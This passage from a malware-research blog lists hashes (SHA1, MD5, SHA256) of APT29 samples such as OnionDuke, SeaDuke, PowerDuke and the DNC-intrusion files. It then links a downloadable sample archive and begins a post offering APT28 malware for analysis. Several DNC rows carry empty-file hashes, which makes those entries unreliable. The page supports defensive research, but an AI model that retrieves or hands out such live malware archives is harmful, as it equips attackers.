<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B3873D2C969D224B0FD17B5F886EA253AC1BFB5B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2d96b4c95152819a888deccf7ec965d6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ac9c7ac457a605ff836eb6fe127eabc7a251dd73ea0a1fa59a591de30fa75d3f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B491C14D8CFB48636F6095B7B16555E9A575D57F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c8eb6040fd02d77660d19057a38ff769</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C1EC762878A0EED8EBF47E122E87C79A5E3F7B44</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c0f27bcdede7fe36664770dfe9f84044</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6271c4909f39e1f29dcc79cde0f526cbde45d906726e73bd3b52d041a34eda38</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CCE5B3A2965C500DE8FA75E1429B8BE5AA744E14</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">16bb0f9d98eb7a832b6db1e92f4e4f1a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ddce4b5e1c03d04bb82780a2d0f08469bb589b6fe8f0d4cc2a140b16344f5bd1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D433F281CF56015941A1C2CB87066CA62EA1DB37</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d1ce79089578da2d41f1ad901f7b1014</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E09F283ADE693FF89864F6EC9C2354091FBD186E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">80a93e5dd3a3ea22f9a9af1547f797ab</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">df03f0ae0622f5040bf449ab8b7559a97da7f746cc2ce24a8ad5336b18699296</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E519198DE4CC8BCB0644AA1AB6552B1D15C99A0E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d33e91246924adb5edc97ceae8a60084</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4558eb18504f724e4f33f1504ff924ce64701d26d703cf1e42a48504e7f51927</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F2B4B1605360D7F4E0C47932E555B36707F287BE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">591a5ef38c1be504fbbc88219eb39692</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d04bef6765408d528fdf82a46c157b44e8b5e7762a15b0264033c9558ccc48dd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">OnionDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F3DCBC016393497F681E12628AD9411C27E57D48</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f23a89f3b7b6fa1312e6a10ede4e23a6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">316528ade312cc5ed76f0b44c7f2c2fc84f60ae215992d9393f57431383cf776</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">SeaDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">SeaDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3459D9C27C31C0E8B2EA5B21FDC200E784C7EDF4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e315436c42e681962a8e174ef7fad480</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c0b939598bf5913885b1837637f166fda09d932f3484525c8cbcc0b1efba2520</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">SeaDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">AA7CF4F1269FA7BCA784A18E5CECAB962B901CC2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">22a46be630c877e2885c51147de10863</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c11212ff6474a15402ac848d1e4b9c6ced3deafb959b59837f14b834e5d0ad15</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">SeaDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BB71254FBD41855E8E70F05231CE77FEE6F00388</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a25ec7749b2de12c2a86167afa88a4dd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0B3852AE641DF8ADA629E245747062F889B26659.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d41d8cd98f00b204e9800998ecf8427e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">74C190CD0C42304720C686D50F8184AC3FADDBE9.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d41d8cd98f00b204e9800998ecf8427e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CB872EDD1F532C10D0167C99530A65C4D4532A1E.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d41d8cd98f00b204e9800998ecf8427e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E2B98C594961AAE731B0CCEE5F9607080EC57197_pagemgr.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d41d8cd98f00b204e9800998ecf8427e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F09780BA9EB7F7426F93126BC198292F5106424B_VmUpgradeHelper.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d41d8cd98f00b204e9800998ecf8427e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-11_Volexity_PowerDukePostElection</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-11_Volexity_PowerDukePostElection</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4BCBF078A78BA0E842F78963BA9DD71240AB6A6D_cldsys.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57c627d68e156676d08bfc0829b94331</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6119c92f5b5cb2cd953925e17ceb4a02a9007029dd27a35d44b116ff9718f814</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5CC807F80F14BC4A1D6036865E50D576200DFD2E_RWP16-038_Norris.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3335f0461e5472803f4b19b706eaf4b5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4538af0a76fecc6e45e6d45c22618c52ba89bf596a0b68dd2d4d2358fb5c86ef</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">68CE4C0324F03976247FF48803A7D988F9F9F43F_37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f713d5df826c6051e65f995e57d6817d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2d2fa32f928f8abf31b9e79153422d65fe72cd5ad0d1f815a9d2ffa42fc8d224</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A76C02C067EAE26D78F4B494274DFA6AEDC6FA7A_37486.ZIP_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f79caf27a99c091e6c1775b306993341</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f37da55a4329df13b1283cbfd237ae832cebb4b9c4ed16e5a1e0b98d9b7fdf25</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B5684384C8028F0324ED7119F6ABF379F2789970_election-headlines-FTE2016.docm_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a8e700492e113f73558131d94bc9ae2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ef4a4319b9c37c1f05a4cbfb136c0eaf4a05476028d40a2a6bb07afc567f0f88</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Samples</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D5DCF445830C54AF145C0DFEAEBF28F8EC780EB5_RWP_16-038_Norris.ZIP_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8b3050a95e3ce00424b85f6e9cc3ccec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6412ea144bb0b8f7d32becda26cd1549825fd7b282f1f96319e5f4000e3d4618</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">617BA99BE8A7D0771628344D209E9D8A_Star Polk.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">617ba99be8a7d0771628344d209e9d8a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7FCE89D5E3D59D8E849D55D604B70A6F_default.php_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7fce89d5e3d59d8e849d55d604b70a6f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">81F1AF277010CB78755F08DFCC379CA6_ fhyge.rtf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">81f1af277010cb78755f08dfcc379ca6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8f154d23ac2071d7f179959aaba37ad5.dll_SayWhatBackdoor</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8f154d23ac2071d7f179959aaba37ad5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ae7e3e531494b201fbf6021066ddd188.dll_SayWhatBackdoor</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ae7e3e531494b201fbf6021066ddd188</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2017-03_Fireeye_Domain_Fronting_with_Tor</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8ddef83c57a5a752b20e3f98209acba4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ab6c907b4fe844c01294a8dcfbc11ba966124b5b5aeb8af34a49d112fdbea60</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2017-03_Fireeye_Domain_Fronting_with_Tor</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57e2f0fdc2566f11af661dc02e989dd65132a3f4_GoogleService.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">31b3069cef380b4bf85e75a8885bcee8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2f39dee2ee608e39917cc022d9aae399959e967a2dd70d83b81785a98bd9ed36</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2017-03_Fireeye_Domain_Fronting_with_Tor</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6842243f5a41f66a81b85ee524c3cfc7ace10da8_googleService.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">628d4f33bd604203d25dbc6a5bb35b90</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fe744a5b2d07de396a8b3fe97155fc64e350b76d88db36c619cd941279987dc5</span></td></tr>
</tbody></table>
</div>
<div id="footer" style="border-top-color: rgb(102, 102, 102); border-top-style: solid; border-width: 1px 0px 0px; color: #1c1c1c; font-stretch: inherit; line-height: inherit; margin: 1em 0px 0px; padding: 1em; text-align: center; vertical-align: baseline;">
<div style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; margin-top: 1em; padding: 0px; vertical-align: baseline;">
<div style="text-align: left;">
<br /></div>
</div>
</div>
</div>
<div style="font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 14px;">
<a href="https://www.dropbox.com/s/htzh42yrze5045m/pakfil.zip?dl=0" style="color: #660000; text-decoration: none;" target="_blank"></a></div>
</div>
</div>
</div>
</div>
</div><span><!--more--></span><span><!--more--></span><span><!--more--></span><span><!--more--></span><span><!--more--></span><span><!--more--></span><span><!--more--></span><span><!--more--></span>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-88972598193043809172017-03-20T00:28:00.000-04:002017-03-20T00:28:02.930-04:00DeepEnd Research: Analysis of Trump's secret server story<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)<br />
<br />
<h3 style="text-align: left;">
<a href="http://www.deependresearch.org/">Analysis of Trump's secret server story...</a></h3>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhajlrtkh9J83pJvCHlqtlH6oeODY4RLT9nx7aihp_nhRXwkI1XOfK9NLQDNebzjvmfmOmjslhvQ7oC5DzgdM2RqJ-xmMPiqIxe8Yu2Zfd_bwKE-KcuPUwa05OeCHYaJSdLwSuhyxcWY_Q/s1600/screenshot-1796.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhajlrtkh9J83pJvCHlqtlH6oeODY4RLT9nx7aihp_nhRXwkI1XOfK9NLQDNebzjvmfmOmjslhvQ7oC5DzgdM2RqJ-xmMPiqIxe8Yu2Zfd_bwKE-KcuPUwa05OeCHYaJSdLwSuhyxcWY_Q/s640/screenshot-1796.png" width="640" /></a></div>
<br /></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-58282963335008724232017-02-20T21:23:00.000-05:002017-03-31T02:03:28.974-04:00Part I. Russian APT - APT28 collection of samples including OSX XAgent<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-UECwIFIJjdjvu0IWTqD2Zg_hvQ5eMGWAjnfMcABK9PgBbAJoY7QoTt3MftSKEwVNPzLGkYG1eGGC7gPL2Rl8YoEdJb79AlHakKM_-Ea7TdWG7obF8s8njPASJ4m2tqEfT6EDU8AaJs/s1600/go_west.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-UECwIFIJjdjvu0IWTqD2Zg_hvQ5eMGWAjnfMcABK9PgBbAJoY7QoTt3MftSKEwVNPzLGkYG1eGGC7gPL2Rl8YoEdJb79AlHakKM_-Ea7TdWG7obF8s8njPASJ4m2tqEfT6EDU8AaJs/s1600/go_west.jpg" imageanchor="1" style="clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-UECwIFIJjdjvu0IWTqD2Zg_hvQ5eMGWAjnfMcABK9PgBbAJoY7QoTt3MftSKEwVNPzLGkYG1eGGC7gPL2Rl8YoEdJb79AlHakKM_-Ea7TdWG7obF8s8njPASJ4m2tqEfT6EDU8AaJs/s320/go_west.jpg" width="320" /></a></div>
This post is for all of you, Russian malware lovers/haters. Analyze it all to your heart's content. Prove or disprove Russian hacking in general or DNC hacking in particular, or find that "400 lb hacker" or nail another country altogether. You can also have fun and exercise your malware analysis skills without any political agenda.<br />
<br />
<div>
